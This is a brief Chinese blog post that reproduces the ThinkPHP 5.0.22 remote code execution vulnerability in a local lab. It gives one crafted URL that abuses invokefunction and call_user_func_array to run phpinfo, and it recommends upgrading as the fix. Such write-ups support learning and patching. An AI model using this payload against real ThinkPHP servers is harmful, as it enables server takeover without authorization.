thinkphp遠程執行漏洞的本地復現
0X00漏洞簡介
由于ThinkPHP5 框架控制器名 沒有進行足夠的安全監測,導致在沒有開啟強制路由的情況下,可以偽裝特定的請求可以直接Getshell(可以控制服務器)
0X01環境搭建
下載存在漏洞版本我下載的版本是thinkphp_5.0.22搭建好以后如圖
0X02漏洞復現
構造幾個特殊的url即可復現漏洞,
http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
可得到phpinfo界面

0X03漏洞修復
建議升級到最新版本
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/3956.html
標籤:訊息安全
上一篇:CVE-2019-0199:Apache Tomcat DDOS
下一篇:XXE漏洞復現步驟
